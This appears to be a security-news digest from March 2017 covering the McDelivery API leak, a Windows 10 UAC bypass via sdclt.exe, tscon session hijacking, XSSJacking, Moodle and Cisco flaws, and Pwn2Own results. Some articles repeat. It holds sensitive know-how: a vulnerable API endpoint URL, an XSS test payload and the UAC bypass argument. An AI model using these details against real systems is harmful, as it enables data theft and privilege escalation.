According to Fallible, many companies in India ignore user data protection, mainly because there are no strong data protection and privacy laws or penalties. Furthermore, “there is a similar lack of push from non-government organizations to improve this scenario,” the company says. In the past, the security firm has discovered over 50 instances of data leaks in several Indian organizations.

In January, Fallible revealed that many third-party applications unnecessarily store keys or secrets that could allow attackers to access and leak data related to some of the most popular online services, including Twitter, Flickr, Dropbox, Slack, and Uber, as well as Amazon AWS (Amazon Web Services).


Fileless Attack Can Bypass User Account Control in Windows 10

21.3.2017 securityweek Virus
A recently disclosed User Account Control (UAC) bypass that leverages App Paths can be used for fileless attacks as well, security researcher Matt Nelson now says.

Last week the researcher revealed that App Paths and the Backup and Restore tool (sdclt.exe) in Windows 10 can be abused to bypass the UAC because sdclt.exe auto-elevates due to its manifest. Nelson published a proof-of-concept (PoC) script to demonstrate the attack, but warned that, because parameters weren’t supported, the payload had to be saved on the disk.

Nelson, who has a history of revealing UAC bypass techniques (such as last year’s Event Viewer and Disk Cleanup methods), now reveals that fileless attacks abusing the App Paths UAC bypass are possible as well. As before, however, the attack is possible only on Windows 10, because sdclt.exe’s manifest in previous releases prevents it from auto-elevation when started from medium integrity.

The researcher explains that, while analyzing the sdclt.exe binary to look for command line arguments, he discovered that, if a specific argument was used, a parameter could be added to sdclt.exe, which would be executed with elevated privileges.

The researcher published a PoC on GitHub to demonstrate the bypass and explains that the script takes a full path to the payload and any parameters. Moreover, it automatically adds the necessary keys, starts ‘sdclt.exe /kickoffelev,’ and then erases traces of the attack.

The same as before, the attack can be prevented by setting the UAC level to ‘Always Notify’ or by removing the current user from the Local Administrators group. The researchers notes that looking for new registry entries in HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand is a good method of monitoring the system for this type of attack.


Hacked Websites on the Rise: Google

21.3.2017 securityweek Hacking
Google painted a bleak picture of cybersecurity trends Monday, saying the number of websites hacked rose 32 percent last year, with little relief in sight.

"We don't expect this trend to slow down. As hackers get more aggressive and more sites become outdated, hackers will continue to capitalize by infecting more sites," Google said in a post on its webmaster blog.

Google, which inserts security warnings when it detects hacked sites, said most of those warned can clean up their pages, but that 61 percent are not notified because their sites are not verified by the search engine.

"As always, it's best to take a preventative approach and secure your site rather than dealing with the aftermath," the blog said. "Remember a chain is only as strong as its weakest link."

The news comes amid growing concerns over cybersecurity in the wake of massive hacks affecting Yahoo, the US government and major e-commerce firms.

Google said certain website hacks often follow similar patterns -- some insert "gibberish" on a page, while others create Japanese text that links to fake brand merchandise sites.

"Hacking behavior is constantly evolving, and research allows us to stay up to date on and combat the latest trends," Google said.


McDonald’s McDelivery app leaks details of over 2.2 million customers
21.3.2017 securityaffairs Crime

The McDelivery application used by McDonald’s customers in India was found to be leaking the personal data of more than 2.2 million users.
McDelivery is a web application used by McDonald’s customers in India that was found to be leaking the personal information of more than 2.2 million users.

mcdelivery

The issue was discovered by researchers at security startup Fallible, who discovered that the application was leaking user data, including names, email addresses, phone numbers, home addresses, home co-ordinates, and social profile links.

“The McDonald’s India app, McDelivery is leaking personal data for more than 2.2 million of its users which include name, email address, phone number, home address, accurate home co-ordinates and social profile links. ” reads the blog post published by Fallible.

The data leak in the McDelivery app is the result of an unprotected publicly accessible API endpoint that was designed to deliver user details, which is coupled with serially enumerable integers as customer IDs.

The API Endpoint is:

http://services.mcdelivery.co.in/ProcessUser.svc/GetUserProfile

and below a sample response to the curl request shared by the experts:

An attacker can exploit the issue to enumerate all the users of the application and access related data.

The application fails to check if the user ID requested via the API is the same user who has logged in. The user ID is a plain number that starts from 1 and can be enumerated by an attacker to retrieve data of the users.

The issue was reported on Feb. 7, and a Senior IT Manager at McDonald’s confirmed the vulnerability on Feb. 13. The company addressed the vulnerability last week, but according to the experts at Fallible, the fix was incomplete.

“The McDonald’s fix is incomplete and the endpoint is still leaking data. We have communicated this again to them and are waiting for their response.” continues the analysis.

Just after the release of the patch, McDonald’s published a statement on its Facebook page to announce the update and prompting users to update the application as soon as possible.

“We would like to inform our users that our website and app does not store any sensitive financial data of the users like credit card details, wallets passwords or bank account information. The website and app has always been safe to use, and we update security measure on regular basis.” reads the statement issued by McDonald’s. “As a precautionary measure, we would also urge our users to update the McDelivery app on their devices,”


Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password
20.3.2017 thehackernews Hacking
Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password
You may be aware of the fact that a local Windows user with system rights and permissions can reset the password for other users, but did you know that a local user can also hijack other users' session, including domain admin/system user, without knowing their passwords?
Alexander Korznikov, an Israeli security researcher, has recently demonstrated that a local privileged user can even hijack the session of any logged-in Windows user who has higher privileges without knowing that user's password, using built-in command line tools.
This trick works on almost all versions of Windows operating system and does not require any special privileges. Korznikov is himself unable to figure out if it is a Windows feature or a security flaw.
The issue discovered by Korznikov is not entirely new, as a French security researcher, namely Benjamin Delpy, detailed a similar user session hijacking technique on his blog some six years ago.
Korznikov calls the attack a "privilege escalation and session hijacking," which could allow an attacker to hijack high-privileged users' session and gain unauthorized access to applications and other sensitive data.
For successful exploitation, an attacker requires physical access to the targeted machine, but using Remote Desktop Protocol (RDP) session on a hacked machine; the attack can be performed remotely as well.
Video Demonstrations and PoC Exploit Released!

 

Korznikov has also provided a few video demonstrations of a successful session hijacking (using Task manager, service creation, as well as command line), along with Proof-of-Concept (PoC) exploit.
Korznikov successfully tested the flaw on the newest Windows 10, Windows 7, Windows Server 2008 and Windows Server 2012 R2, though another researcher confirmed on Twitter that the flaw works on every Windows version, even if the workstation is locked.
While Microsoft does not deem it to be a security vulnerability and some experts argued that a Windows user with administrative permissions can do anything, Korznikov explained a simple attack scenario to explain how a malicious insider can easily misuse this flaw:
"Some bank employee have access to the billing system and its credentials to log in. One day, he comes to work, logging into the billing system and start to work. At lunchtime, he locks his workstation and goes out for lunch. Meanwhile, the system administrator gets to can use this exploit to access employee's workstation."
"According to the bank's policy, administrator's account should not have access to the billing system, but with a couple of built-in commands in windows, this system administrator will hijack employee's desktop which he left locked. From now, a sysadmin can perform malicious actions in billing system as billing employee account."

 

Well, no doubt, alternatively an attacker can also dump out system memory to retrieve users' passwords in plaintext, but this is a long and complicated process compared to just running tscon.exe with a session number without leaving any trace and using any external tool.
The issue has been known to Microsoft since last six years, so it's likely the company doesn't consider it a security flaw as it requires local admin rights on the computer, and deems this is how its operating system is supposed to behave.


IBM and SecureKey Announce Blockchain-Based Identity Verification

20.3.2017 securityweek Safety
The blockchain promise took a step closer to fruition today with IBM and SecureKey making a joint announcement of a blockchain-based digital identity network.

Built on the Linux Foundation's open source Hyperledger Fabric v1.0 and the IBM Blockchain service, a new digital identity and attribute sharing network will go live in Canada later in 2017.

SecureKey Technologies is a Toronto-based identity and authentication provider. It had already decided that it didn't want to use a central broker-based system to hold identities, because that would be a huge target for hackers. Nor did it want to be in the position of handing out too much personal data to everyone who demanded it.

"Right now, I would argue a driver's license shares too much," explains Greg Wolfond, founder and CEO of SecureKey. "A girl goes to a bar, and she has to share her name, address and weight with the bouncer. That's crazy. All he needs to know is that she's over 21. How to make this work electronically we couldn’t solve well until we saw it on Hyperledger."

The new service, currently consumer-centric, will work with the trust people have in their bank. It will start in Canada, but both IBM and SecureKey intend to take it global. Leading Canadian banks, including BMO, CIBC, Desjardins, RBC, Scotiabank and TD, joined the digital identity ecosystem in October, 2016, and collectively invested $27M in SecureKey.

The result is a bank-verified identity that can be used via a mobile app provided by the bank. Users will be able to control what identifying information they share from the blockchain stored trusted credentials to the organizations of their choice, and for those organizations to quickly validate the user's identity to arrange new services. For example, once the users have proven their identity with their bank and a credit agency, they can grant permission to share only specified data with a utility to create a new account.

"What IBM is building with SecureKey and members of the digital identity ecosystem in Canada, including major banks, telecom companies and government agencies, will help tackle the toughest challenges surrounding identity," said Marie Wieck, general manager, IBM Blockchain. "This method is an entirely different approach to identity verification, and together with SecureKey, we have a head start on putting it on the blockchain. This is a prime example of the type of innovation permissioned blockchain networks can accelerate."

Personal data is one of the most highly regulated areas of computing. European laws, which will apply to European data regardless of the nationality of the data-holding organization, have two particularly difficult concepts: firstly, that only the required amount of personal data is held, and secondly, that users have a right to have that data removed.

The ability to provide only the required data for identification in each different circumstance goes a long way to satisfy the first problem. The second is, under normal circumstances, more difficult. The blockchain was originally designed to be immutable, with the effect that Europe's 'right-to-be-forgotten' could not be applied.

IBM claims to have solved this problem. Jerry Cuomo, IBM's vice-president of blockchain technologies, said that IBM has solved this problem while still adhering to Blockchain immutability. "We do have a patent pending, so I don't want to go into too much detail," he said. "But we solved it without deleting from the blockchain, which is pretty cool."

The system solves some, but not all, of the identity problems described and solved by the Global Identity Foundation's Identity 3 project. The big advantage is that it provides only the necessary elements of personal identity to prove personal identity in each instance. This is similar to Identity 3. Where it differs, however, is that the totality of the personal data is still under the control of a single organization. A basic principle of Identity 3 is 'anonymity at the root of identity'; and this clashes with the concept of bank-based verification.

It also ultimately limits the global potential of the system: individual governments will still be able to access the data. This will be of limited importance to most users where it is their own government able to access their data; but (unless solved) would prevent the expansion of the system across national borders. To expand globally, IBM and SecureKey may be forced to offer localized versions in different countries.

Identity 3's anonymity at the root of identity split across multiple verifiers solves this issue. At a technical level, Chinese Identity 3 identities could be trusted within the US, and American Identity 3 identities could be trusted in China. This is unlikely to happen with a Canada-based blockchain system.

Despite these limitations, the SecureKey IBM Blockchain solution offers huge potential. For the moment it is described as a 'consumer' solution. Over time we can expect it to expand. "You have to solve for individual identity first but then it is very applicable to businesses," Wolfond told SecurityWeek. "We are already engaging in a few projects to bring business use to life."


McDonald's App Leaks Details of 2.2 Million Customers

20.3.2017 securityweek Incindent
A vulnerable application used by millions of McDonald’s customers in India was recently found to leak personal information on its users.

Dubbed McDelivery, the web application was found to be leaking the personal information of over 2.2 million users. According to Fallible, the software security startup that discovered the bug, user data such as names, email addresses, phone numbers, home addresses, home co-ordinates, and social profile links were leaked by the application.

The issue, they reveal, resides in an unprotected publicly accessible API endpoint that was designed to deliver user details, which is coupled with serially enumerable integers as customer IDs. The pair can be used to pull the personal information pertaining to all of the application’s users.

“The mistake in this case was trivial and ought to have been fixed in a day at max. The app/website provides a facility to retrieve the current user details but does not check if the user ID being asked is the same user who has logged in. The user ID in this case is a plain number that starts from 1 and can be enumerated easily,” Abhishek Anand, Fallible co-founder, told SecurityWeek.

The vulnerability was discovered and disclosed on Feb. 7, and the company received acknowledgement from a Senior IT Manager at McDonald’s on Feb. 13, but the issue was addressed only last week, it seems. According to Fallible, however, McDonald’s fix wasn’t released in a timely manner and was also incomplete.

“We have always respected a company's request if they wanted more time to fix any issue but sadly they stopped responding after 4 weeks which led to us warning users that their data is out in the open. In fact, the 'fix' applied right now is incomplete and the vulnerability exists even now and we have intimated the same to the concerned company,” Anand told us.

Over the weekend, McDonald's published a statement on Facebook, saying that it has released an updated iteration of the McDelivery application and that it is prompting all users to update as soon as possible, as a precautionary measure.

“We would like to inform our users that our website and app does not store any sensitive financial data of the users like credit card details, wallets passwords or bank account information. The website and app has always been safe to use, and we update security measure on regular basis. As a precautionary measure, we would also urge our users to update the McDelivery app on their devices,” the statement reads.

According to Fallible, many companies in India ignore user data protection, mainly because there are no strong data protection and privacy laws or penalties. Furthermore, “there is a similar lack of push from non-government organizations to improve this scenario,” the company says. In the past, the security firm has discovered over 50 instances of data leaks in several Indian organizations.

In January, Fallible revealed that many third-party applications unnecessarily store keys or secrets that could allow attackers to access and leak data related to some of the most popular online services, including Twitter, Flickr, Dropbox, Slack, and Uber, as well as Amazon AWS (Amazon Web Services).


New Bill Forces Cybersecurity Responsibility Into the Boardroom

20.3.2017 securityweek Cyber
Board Room

Cybersecurity Disclosure Act of 2017 Forces Cybersecurity Responsibility Into the Boardroom

The need for board-level responsibility for cyber security is generally accepted but not always applied. A new bill introduced to the Senate seeks to change this by requiring a board level statement of cyber security expertise or practice in annual SEC filings.

S536, cited as the 'Cybersecurity Disclosure Act of 2017', is sponsored by Democrats Mark Warner of Virginia and Jack Reed of Rhode Island, and Republican Susan Collins of Maine. Its purpose is to promote transparency in the oversight of cybersecurity risks at publicly traded companies.

The bill (PDF) defines a cyber security threat as any action not protected by the First Amendment that "may result in an unauthorized effort to adversely impact the security, availability, confidentiality, or integrity of an information system or information that is stored on, processed by, or transiting an information system..."

The bill then proposes just three requirements under the aegis of the Securities and Exchange Commission (SEC): that annual reports to the SEC must disclose the level of cyber security expertise of the board; or, if none exists, what "other cybersecurity steps taken by the reporting company were taken into account"; and that the definition of what constitutes that expertise should come from the SEC in consultation with NIST.

"It is in the best interest of consumers and shareholders for companies to fully disclose the plans they've set in place to defend against [data breaches]," Warner said in a statement announcing the legislation. "This legislation provides needed transparency in an often-shrouded process that directly affects the privacy of millions, and will serve as tool to urge other entities to follow through on establishing a reliable strategy to counter cyberattacks."

The effect of the bill will be to make the board legally and transparently responsible for cyber security. It is not the first regulation to seek this effect in 2017. On 1 March, the New York Department of Financial Services' 23 NYCRR 500 regulation came into force. That regulation imposes a responsibility for regulated organizations to name a 'CISO' who will provide an annual cyber security report to be submitted and signed off by the board to the regulator.

Taken together, these two examples of new regulations suggest that regulatory authorities are no longer satisfied to make recommendations about board-level security responsibility, but are now ready to mandate and legally require it.

The implication is that it is no longer sufficient that organizations should have security in the board, it will increasingly become a legal requirement.


Serious Flaws Found in Moodle Learning Platform

20.3.2017 securityweek Vulnerebility
Researchers have discovered serious vulnerabilities in Moodle, a popular open-source learning platform used by many top universities in the United States, the United Kingdom and other countries around the world.

Moodle updates released last week address a total of four vulnerabilities, including two that have a “serious” severity/risk rating and two classified as “minor.”

One of the serious flaws, tracked as CVE-2017-2641, can be exploited by an attacker to execute arbitrary PHP code on a vulnerable Moodle server. While the security hole is tracked as a single issue, Netanel Rubin, the expert who discovered the problem, says an attack is possible due to several smaller weaknesses affecting the platform.

The flaw can be exploited by an authenticated attacker to conduct an SQL injection attack via user preferences and add a new administrator user to the system. Once the attacker has an admin account on the system, they can execute arbitrary code by uploading a new plugin or a template to the server, Rubin said.

This vulnerability affects Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and older versions, and it has been fixed with the release of versions 3.2.2, 3.1.5, 3.0.9 and 2.7.19.

Moodle developers noted that the flaw can only be exploited in Moodle versions prior to 3.2 by users with manager or admin rights. In version 3.2, the attack works with any type of user account, including teacher and student accounts.

Rubin, who recently warned that vulnerabilities in smart electricity meters expose consumers and electric utilities to cyberattacks, has published a lengthy blog post detailing his findings.

The second serious flaw patched by Moodle last week has been described as a cross-site scripting (XSS) flaw in the functionality that allows users to attach files for evidence of prior learning.

“Serving files attached to evidence of prior learning did not force download. When viewed by other users they would be opened in current moodle sessions,” Moodle wrote in its advisory.

The flaw, reported by a researcher who uses the online moniker “wez3” and tracked as CVE-2017-2645, only affects versions 3.2 to 3.2.1 and 3.1 to 3.1.4.

Jaymark Pestaño discovered a less severe XSS vulnerability in the evidence of prior learning section, and Nadav Kavalerchik identified an issue related to usernames being displayed in global search for unauthenticated users. Both issues are considered minor.


Microsoft Started Blocking Windows 7/8.1 Updates For PCs Running New Processors
20.3.2017 thehackernews Security

You might have heard the latest news about Microsoft blocking new security patches and updates for Windows 7 and Windows 8.1 users running the latest processors from Intel, AMD, Qualcomm, and others.
Don't panic, this new policy doesn't mean that all Windows 7 and 8.1 users will not be able to receive latest updates in general because Microsoft has promised to support Windows 7 until 2020, and Windows 8.1 until 2023.
But those who have upgraded their machines running older versions of Windows to the latest processors, or manually downgraded their new laptops to run Windows 7/8.1 would be out of luck.
A recently published Microsoft Knowledge Base article suggests that if you are running the older version of operating systems on your computers that feature new processors, including Intel's 7th generation Core i3, i5 and i7 ("Kaby Lake"), AMD Ryzen ("Bristol Ridge") and Qualcomm 8996 chips or later, the security updates will not install.
Instead, you will see error messages when using Windows Update to get patches for Windows 7 and Windows 8.1. The error messages read:
"Unsupported Hardware.
Your PC uses a processor that is not supported on this version of Windows, and you will not receive updates."
"Windows could not search for new updates. An error occurred while checking for new updates for your computer. Error(s) found: Code 80240037 Windows Update encountered an unknown error."
So, What's the Solution ? (According to Microsoft)
Users would require upgrading their systems to the newest version of Windows, i.e. Windows 10, despite Windows 7 being supported to 2020 and Windows 8.1 to 2023.
Microsoft announced this limitation in January 2016, when the company said making Windows 7 and Windows 8.1 OSes run on the latest processors was "challenging."
"For Windows 7 to run on any modern silicon, device drivers and firmware need to emulate Windows 7's expectations for interrupt processing, bus support, and power states- which is challenging for WiFi, graphics, security, and more," Terry Myerson, VP of Microsoft's Windows and Devices Group, said last year.
The initial announcement also included PCs that use 6th-generation Intel processors ("Skylake"), but Microsoft backed off on its plan and released a list of Skylake-based systems that will be fully supported to receive security updates through the official end of support phase for Windows 7 and Windows 8.1, i.e. January 14, 2020, and January 10, 2023, respectively.
Microsoft Indirectly forcing users to adopt Windows 10
This end of updates for new devices doesn't come as a surprise to some PC owners, as Microsoft is making every effort to run its latest Windows on all Windows computers since the launch of Windows 10.
An alarm for those still running Windows Vista on their machines: The operating system will no longer receive security updates, non-security hotfixes, paid assisted supports, or online technical updates from Microsoft beginning April 11, 2017.
So, it's high time for Windows Vista users to upgrade their PCs to the latest version of Windows operating system in order to protect your devices from malware or other security threats.
Ditch Windows for Linux; Try This:
No doubt Windows 10 has been viewed as a welcome successor to Windows 8, both by businesses and individuals, with more enhanced security features. But the OS has also come under scrutiny from those who are concerned about their privacy.
So why not switch to a free Windows 10 alternative? Privacy concerned people can move to Linux operating systems, such as Ubuntu – a Debian-based OS and part of open source Linux family, and Fedora – Red Hat's Linux distro with estimated 1.2 Million users.


IBM and SecureKey Announce Blockchain-Based Identity Verification

20.3.2017 securityweek Safety
The blockchain promise took a step closer to fruition today with IBM and SecureKey making a joint announcement of a blockchain-based digital identity network.

Built on the Linux Foundation's open source Hyperledger Fabric v1.0 and the IBM Blockchain service, a new digital identity and attribute sharing network will go live in Canada later in 2017.

SecureKey Technologies is a Toronto-based identity and authentication provider. It had already decided that it didn't want to use a central broker-based system to hold identities, because that would be a huge target for hackers. Nor did it want to be in the position of handing out too much personal data to everyone who demanded it.

"Right now, I would argue a driver's license shares too much," explains Greg Wolfond, founder and CEO of SecureKey. "A girl goes to a bar, and she has to share her name, address and weight with the bouncer. That's crazy. All he needs to know is that she's over 21. How to make this work electronically we couldn’t solve well until we saw it on Hyperledger."

The new service, currently consumer-centric, will work with the trust people have in their bank. It will start in Canada, but both IBM and SecureKey intend to take it global. Leading Canadian banks, including BMO, CIBC, Desjardins, RBC, Scotiabank and TD, joined the digital identity ecosystem in October, 2016, and collectively invested $27M in SecureKey.

The result is a bank-verified identity that can be used via a mobile app provided by the bank. Users will be able to control what identifying information they share from the blockchain stored trusted credentials to the organizations of their choice, and for those organizations to quickly validate the user's identity to arrange new services. For example, once the users have proven their identity with their bank and a credit agency, they can grant permission to share only specified data with a utility to create a new account.

"What IBM is building with SecureKey and members of the digital identity ecosystem in Canada, including major banks, telecom companies and government agencies, will help tackle the toughest challenges surrounding identity," said Marie Wieck, general manager, IBM Blockchain. "This method is an entirely different approach to identity verification, and together with SecureKey, we have a head start on putting it on the blockchain. This is a prime example of the type of innovation permissioned blockchain networks can accelerate."

Personal data is one of the most highly regulated areas of computing. European laws, which will apply to European data regardless of the nationality of the data-holding organization, have two particularly difficult concepts: firstly, that only the required amount of personal data is held, and secondly, that users have a right to have that data removed.

The ability to provide only the required data for identification in each different circumstance goes a long way to satisfy the first problem. The second is, under normal circumstances, more difficult. The blockchain was originally designed to be immutable, with the effect that Europe's 'right-to-be-forgotten' could not be applied.

IBM claims to have solved this problem. Jerry Cuomo, IBM's vice-president of blockchain technologies, said that IBM has solved this problem while still adhering to Blockchain immutability. "We do have a patent pending, so I don't want to go into too much detail," he said. "But we solved it without deleting from the blockchain, which is pretty cool."

The system solves some, but not all, of the identity problems described and solved by the Global Identity Foundation's Identity 3 project. The big advantage is that it provides only the necessary elements of personal identity to prove personal identity in each instance. This is similar to Identity 3. Where it differs, however, is that the totality of the personal data is still under the control of a single organization. A basic principle of Identity 3 is 'anonymity at the root of identity'; and this clashes with the concept of bank-based verification.

It also ultimately limits the global potential of the system: individual governments will still be able to access the data. This will be of limited importance to most users where it is their own government able to access their data; but (unless solved) would prevent the expansion of the system across national borders. To expand globally, IBM and SecureKey may be forced to offer localized versions in different countries.

Identity 3's anonymity at the root of identity split across multiple verifiers solves this issue. At a technical level, Chinese Identity 3 identities could be trusted within the US, and American Identity 3 identities could be trusted in China. This is unlikely to happen with a Canada-based blockchain system.

Despite these limitations, the SecureKey IBM Blockchain solution offers huge potential. For the moment it is described as a 'consumer' solution. Over time we can expect it to expand. "You have to solve for individual identity first but then it is very applicable to businesses," Wolfond told SecurityWeek. "We are already engaging in a few projects to bring business use to life."


Mozilla Patches Firefox Flaw Disclosed at Pwn2Own

20.3.2017 securityweek Vulnerebility

Mozilla has already patched a Firefox vulnerability disclosed last week at the Pwn2Own 2017 competition by a team of researchers from Beijing-based enterprise security firm Chaitin Tech.

The Chaitin Security Research Lab team hacked Firefox with a SYSTEM-level escalation and earned $30,000. The experts used an integer overflow to break Firefox and an uninitialized buffer flaw in the Windows kernel to escalate privileges.

The integer overflow vulnerability, rated critical and tracked as CVE-2017-5428, was patched on Friday with the release of Firefox 52.0.1. No other security fixes or improvements are included in this release.

“An integer overflow in createImageBitmap() was reported through the Pwn2Own contest,” Mozilla wrote in its advisory. “The fix for this vulnerability disables the experimental extensions to the createImageBitmap API. This function runs in the content sandbox, requiring a second vulnerability to compromise a user's computer.”

Firefox hacked at Pwn2Own 2017

Chaitin Security Research Labs hacks Firefox and runs notepad.exe as SYSTEM

Moritz Jodeit of Blue Frost Security also targeted Firefox at the Pwn2Own competition, but he failed to demonstrate his exploit chain in the allocated timeframe.

In addition to Firefox, the Chaitin Security Research Lab targeted Safari, macOS and Ubuntu, and earned a total of $90,000 for its exploits.

The white hat hackers who took part in Pwn2Own 2017 received a total of $833,000 for finding 51 vulnerabilities in Windows, macOS, Ubuntu, Firefox, Edge, Safari, Flash Player, Adobe Reader and VMware Workstation.

No Chrome flaws have been disclosed at this year’s event and only one was reported at Pwn2Own 2016. It has become increasingly difficult to find critical security holes in Google’s web browser, which is why the company recently decided to increase rewards for remote code execution vulnerabilities to $31,337.


New Attack Combines Self-XSS and Clickjacking

20.3.2017 securityweek Attack
A researcher has demonstrated an attack that combines Clickjacking and a type of Cross Site Scripting (XSS) called Self-XSS. The new attack can trigger Self-XSS on pages that are also vulnerable to Clickjacking, the researcher says.

Dubbed XSSJacking and detailed by Dylan Ayrey, the attack abuses "Pastejacking", which is a method of replacing user's clipboard with attacker-controlled content. Detailed by the same researcher, this technique can only be triggered on browser events, but it allows an attacker to gain code execution by tricking a user into running commands they didn’t want to run.

XSSJacking, Ayrey explains, takes advantage of Pastejacking to force users to paste XSS payloads into text fields framed from other domains. Furthermore, an attacker could trick the user into believing they are interacting with another website, by redressing the frames, making them invisible, and overlaying them on top of other interface elements.

Self-XSS and Clickjacking are often excluded from bug bounty payouts, but the researcher demonstrates that there are relatively practical ways to execute XSS payloads on websites that are vulnerable to both of them.

The Self-XSS vulnerability is usually triggered when the user types in an XSS payload that triggers on itself. This, the researcher says, can be set in a field that only the user can view. Clickjacking, on the other hand, relies on framing a website of a logged in user (usually by setting the opacity of the frame to 0) and forcing the victim to interact with their account on a different website.

To demonstrate the attack, the researcher set up two websites, the first of which has an input field vulnerable to Self-XSS, but designed to only pop an alert if specific code (<script>alert(1)</script>) is entered into the field. The second site asks users to input their email address twice, which entices them to use the Copy-Paste pair of commands (many write the email address in the first field, then copy and paste it in the second field).

“This is where the Pastejacking comes in. After the copy, the contents of their clipboard get overwritten with <script>alert(1)</script>. The second email field is actually a cropped Iframe of the vulnerable site. When the victim goes to paste their email into the field, they'll actually paste the script tag, and trigger the XSS on the victim's domain,” Ayrey notes.

The researcher concludes that, although Clickjacking and Self-XSS are typically excluded from bug bounties, an attacker can easily craft a payload to force the XSS to trigger, if both vulnerabilities are present on the website.


CIA Vault7 Leak – Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution flaw
20.3.2017 securityaffairs Vulnerebility 

After the leak of the CIA Vault7 archive, experts from CISCO warn of Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution flaw.
Recently Wikileaks announced it is planning to share with IT firms details about vulnerabilities in a number of their products, the flaw are exploited by the hacking tools and techniques included in the CIA Vault7 data leak.

Assange sent an email to tech firms including “a series of conditions” that they need to fulfill before gaining access to details included in the Vault7.

But it seems that some IT Giants will not accept the conditions, one of them is CISCO that started its analysis of the documents included in the Vault7 documents. The company has already identified an IOS / IOS XE bug that affects more than 300 of its switch models.

Vault7

The flaw in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could be exploited by a remote, unauthenticated attacker to remotely execute code with elevated privileges and also to cause a reload of the affected device.

The hack could allow attackers to obtain full control of the vulnerale device.

The Cluster Management Protocol leverages on Telnet internally as a signaling and command protocol between members of the cluster.

“The vulnerability is due to the combination of two factors:

The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and
The incorrect processing of malformed CMP-specific Telnet options.”
An attacker could trigger the vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections.

The vulnerability affects the default configuration of the flawed devices even when the user doesn’t have switch clusters configured, and can be exploited over either IPv4 or IPv6.

“An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device”, Cisco’s advisory states.

CISCO advisory confirms that the vulnerability affects 264 Catalyst switches, 51 industrial Ethernet switches, and three other CISCO devices. Of course, the vulnerable devices are all running IOS and configured to accept Telnet connections.

As mitigation measures, experts from CISCO suggest to disabled Telnet connections, SSH remains the best option to remotely access the devices.

At the time I was writing it is not clear if the flaw was exploited in the wild.


Disable TELNET! Cisco finds 0-Day in CIA Dump affecting over 300 Network Switch Models
20.3.2017 thehackernews Vulnerebility

Cisco is warning of a new critical zero-day IOS / IOS XE vulnerability that affects more than 300 of its switch models.
The company identified this highest level of vulnerability in its product while analyzing "Vault 7" — a roughly 8,761 documents and files leaked by Wikileaks last week, claiming to detail hacking tools and tactics of the Central Intelligence Agency (CIA).
The vulnerability resides in the Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software.
If exploited, the flaw (CVE-2017-3881) could allow an unauthenticated, remote attacker to cause a reboot of an affected device or remotely execute malicious code on the device with elevated privileges to take full control of the device, Cisco says in its advisory.
The CMP protocol has been designed to pass around information about switch clusters between cluster members using Telnet or SSH.
The vulnerability is in the default configuration of affected Cisco devices, even if the user doesn't configure any cluster configuration commands. The flaw can be exploited during Telnet session negotiation over either IPv4 or IPv6.
According to the Cisco researchers, this bug occurs in Telnet connections within the CMP, due to two factors:
The protocol doesn't restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members; instead, it accepts and processes commands over any Telnet connection to an affected device.
The incorrect processing of malformed CMP-specific Telnet options.
So, in order to exploit this vulnerability, an attacker can send "malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections," researchers say.
This exploitation could allow the attacker to remotely execute malicious code and obtain full control of the affected device or cause a reload of the affected device.
Disable Telnet On Vulnerable Models — Patch is not Available Yet!
The vulnerability affects 264 Catalyst switches, 51 industrial Ethernet switches, and 3 other devices, which includes Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2/3 EtherSwitch Service Module, Enhanced Layer 2 EtherSwitch Service Module, ME 4924-10GE switch, IE Industrial Ethernet switches, RF Gateway 10, SM-X Layer 2/3 EtherSwitch Service Module, and Gigabit Ethernet Switch Module (CGESM) for HP. (check complete list here)
Currently, this vulnerability is unpatched, and until patches are available, Cisco recommends its users to disable the Telnet connection to the switch devices in favor of SSH.
The company's advisory doesn't talk about any working exploit using this flaw, but if there's one, tens of thousands, if not hundreds of thousands, of devices installed around the world look to have been at great risk for an unknown period — Thanks to the CIA for holding the flaw.
Cisco will update its IOS Software Checker tool immediately as soon as the patches come out.


Hackers Earn $200,000 for VM Escapes at Pwn2Own 2017

20.3.2017 securityweek Congress
White hat hackers earned more than $250,000 for the vulnerabilities they disclosed on the third day of the Pwn2Own 2017 competition, including a couple of exploits that involved escaping VMware virtual machines.

Due to the unprecedented number of contestants and entries, Pwn2Own was extended to three days this year. On the third day, participants targeted the Microsoft Edge browser and VMware Workstation.

First, the 360 Security team earned $105,000 for hacking Edge and achieving a virtual machine (VM) escape. Experts leveraged a heap overflow in Edge, a type confusion in the Windows kernel and an uninitialized buffer flaw in VMware to complete the task.

Tencent Security’s Team Sniper earned $100,000 for a VMware Workstation exploit that can be used to escape VMs. The group leveraged a use-after-free in Windows, and information disclosure and uninitialized buffer flaws in VMware.

The Zero Day Initiative (ZDI) pointed out that a complete exploit was not easy to pull off in this category due to the fact that VMware Tools was not installed in the guest operating system.

Richard Zhu, aka fluorescence, also targeted Edge, but he only earned $55,000 as his exploit chain did not result in a VM escape. The researcher leveraged two use-after-free vulnerabilities in Edge and a buffer overflow in the Windows kernel to escalate privileges to SYSTEM.

ZDI paid out a total of $833,000 for the 51 vulnerabilities disclosed at Pwn2Own 2017. In comparison, participants only earned $460,000 at last year’s event for 21 new flaws.

360 Security obtained the highest number of Master of Pwn points this year, earning them 65,000 ZDI points worth $25,000.

On the first day of Pwn2Own 2017, white hat hackers received $233,000 for hacking Edge, Safari, Ubuntu and Adobe Reader. On the second day of the competition, experts took home $340,000 for exploits targeting Windows, macOS, Firefox, Edge, Safari and Flash Player.


Researcher leveraged App Paths to bypass User Account Control in Windows 10
